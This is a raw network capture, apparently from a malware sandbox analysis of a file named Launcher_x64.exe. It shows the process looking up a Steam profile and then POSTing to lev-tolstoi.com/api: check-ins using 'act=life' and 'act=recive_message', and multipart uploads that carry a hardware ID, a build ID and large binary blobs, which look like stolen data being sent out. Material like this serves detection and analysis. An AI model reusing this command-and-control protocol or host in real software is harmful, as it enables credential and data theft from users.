2024-12-23 00:18:11 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-23 00:18:12 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 23 Dec 2024 00:18:12 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=3ea8fdf0261ff897b4cc175e; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-23 00:18:12 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 00:18:12 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-23 00:18:12 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.4 | 49772 | 172.67.157.254 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe |
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:14 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=bg7k022palm5stn4uchqn6pegj; expires=Thu, 17 Apr 2025 18:04:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5cM3xwq5FCdfb8%2FHcrePTJpCqOKJ%2FEGMe7QzVqQNO0t3icEd2N3TyAJ%2FwdXbkIDblQTpLZksui0ZFf9YuEQzJkcefWHejexefjBnn59YAF7iU7sBprnserX8kTUA%2Bq9c2L8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c594e0d18ee-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1510&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1933774&cwnd=144&unsent_bytes=0&cid=4c826c2826ebe78d&ts=645&x=0"
2024-12-23 00:18:14 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 00:18:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49777 | 172.67.157.254 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:18:16 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 54
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-23 00:18:16 UTC | 54 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 26 6a 3d
                                                                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--swetamubcoyu&j=
2024-12-23 00:18:17 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=iia9ljn4vdlq40nhagf926mjm7; expires=Thu, 17 Apr 2025 18:04:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTEpDFcEKp2FhjbFZdndkNXFzEq26do8wy3fvmVgUwuWpcaKs4U7NZnzAc%2B0meo%2F%2BA%2FBaU1615NDezVe6yxZQyF%2FTdY5Q64ZBULLuqZsndZ5gwgTskmc8FO3kq%2Fo%2F33sPLE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c653b39de95-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1440&min_rtt=1432&rtt_var=554&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1945369&cwnd=240&unsent_bytes=0&cid=7bba36951ca18bcc&ts=790&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49784 | 172.67.157.254 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:18:18 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=OMYEZFJQ2JXV
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 18134
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-23 00:18:18 UTC | 15331 | OUT | Data Raw: 2d 2d 4f 4d 59 45 5a 46 4a 51 32 4a 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 4f 4d 59 45 5a 46 4a 51 32 4a 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 4d 59 45 5a 46 4a 51 32 4a 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 4f 4d 59 45 5a 46 4a
                                                                                                                                                                                                                                                                                      Data Ascii: --OMYEZFJQ2JXVContent-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--OMYEZFJQ2JXVContent-Disposition: form-data; name="pid"2--OMYEZFJQ2JXVContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--OMYEZFJ
2024-12-23 00:18:18 UTC | 2803 | OUT | (binary data)
2024-12-23 00:18:19 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=jgirq34bjd1na4oph986h7fa27; expires=Thu, 17 Apr 2025 18:04:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0JGqysR4Us9%2F7zt1m58xBC%2FzeR6FE2w8UdpIL4oMFgFZJK2FJMQHV%2Brl47Z3eK8b6XSmihsjgsTeeOMbFOt%2F%2Fg72aNz948A2emgDdRT%2FPqZl9wJQMv8WECtPG02VbpTrqg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c73ebdd43df-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1663&rtt_var=648&sent=13&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19089&delivery_rate=1658148&cwnd=243&unsent_bytes=0&cid=2d5a8f490dad3ee1&ts=1002&x=0"
2024-12-23 00:18:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-23 00:18:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49790 | 172.67.157.254 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:18:21 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=49MCAZNGRSS936MHK3O
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 8797
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-23 00:18:21 UTC | 8797 | OUT | Data Ascii:
--49MCAZNGRSS936MHK3O
Content-Disposition: form-data; name="hwid"

68C6103D0F18277B312F742701D40858
--49MCAZNGRSS936MHK3O
Content-Disposition: form-data; name="pid"

2
--49MCAZNGRSS936MHK3O
Content-Disposition: form-data; name="lid"

LPnhqo--sw
2024-12-23 00:18:21 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=0as7ohk41nbhj75n05ucfesmtu; expires=Thu, 17 Apr 2025 18:05:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oj4YlETrPJBHq0m4qycvPi5BOT3EaezSl6N3RP6UW4bA2jhdRo%2FjGl9zf20Kl%2BUyjDuEuya7%2BlwMkjr88vBe8wJqldOqd5jQbjxbLrhUln3RPINWMoi5INvneMNU5Fr2dZ8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c825c4143b6-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1728&rtt_var=664&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2834&recv_bytes=9736&delivery_rate=1627647&cwnd=224&unsent_bytes=0&cid=9ee9fad3f3adba8b&ts=685&x=0"
2024-12-23 00:18:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-23 00:18:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49795 | 172.67.157.254 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:18:23 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=Q57AHR6AEG435T1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 20426
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-23 00:18:23 UTC | 15331 | OUT | Data Ascii:
--Q57AHR6AEG435T1
Content-Disposition: form-data; name="hwid"

68C6103D0F18277B312F742701D40858
--Q57AHR6AEG435T1
Content-Disposition: form-data; name="pid"

3
--Q57AHR6AEG435T1
Content-Disposition: form-data; name="lid"

LPnhqo--swetamubcoyu
2024-12-23 00:18:23 UTC | 5095 | OUT | (binary data)
2024-12-23 00:18:24 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=58fq91h8k108i7e4pasmn8nl3i; expires=Thu, 17 Apr 2025 18:05:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aomnSf9zBbtubRRzt50StRiZDvL21CR691nJ4BqBguSS2mI%2BPpbPfH2XgnYIcZEO57wacye29kcBf3VOdfkD4OdyeHnx9BYf2B9ZRRcCJ%2BL5r4mNNuFHBg0TI5Zs9s5DCTU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c8fe9744261-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=652&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21384&delivery_rate=1676234&cwnd=239&unsent_bytes=0&cid=825f26e9e14b32be&ts=1270&x=0"
2024-12-23 00:18:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 00:18:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49801 | 172.67.157.254 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:18:25 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=X3DIBSUGUL5J3X9DJ
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 1260
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-23 00:18:25 UTC | 1260 | OUT | Data Raw: 2d 2d 58 33 44 49 42 53 55 47 55 4c 35 4a 33 58 39 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 58 33 44 49 42 53 55 47 55 4c 35 4a 33 58 39 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 33 44 49 42 53 55 47 55 4c 35 4a 33 58 39 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62
                                                                                                                                                                                                                                                                                      Data Ascii: --X3DIBSUGUL5J3X9DJContent-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--X3DIBSUGUL5J3X9DJContent-Disposition: form-data; name="pid"1--X3DIBSUGUL5J3X9DJContent-Disposition: form-data; name="lid"LPnhqo--swetamub
2024-12-23 00:18:26 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=9p4hf7euqn6qfid91g6pibee2r; expires=Thu, 17 Apr 2025 18:05:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJOzLbMsitPsrk%2Box72S02F5ek5CDLbVdI4WN2nwWr7PKXl8BIO2Y0qa8AsgK8bAlwDUclpaMmlrxEemjNSDEyTbwIZQk0CCP%2Fxj88BxkhtHO8y03n4v4CSuqJWfrHOyOu4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642ca17d6242d2-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1758&rtt_var=663&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2175&delivery_rate=1660978&cwnd=227&unsent_bytes=0&cid=ff900414306cfb21&ts=772&x=0"
2024-12-23 00:18:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 00:18:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49807 | 172.67.157.254 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:18:29 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=X0QYLC67LN
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 564957
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
2024-12-23 00:18:29 UTC | 15331 | OUT | Data Raw: 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43
                                                                                                                                                                                                                                                                                      Data Ascii: --X0QYLC67LNContent-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--X0QYLC67LNContent-Disposition: form-data; name="pid"1--X0QYLC67LNContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--X0QYLC67LNC
2024-12-23 00:18:31 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=in6scgf6o97qgs0edif1avhqei; expires=Thu, 17 Apr 2025 18:05:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
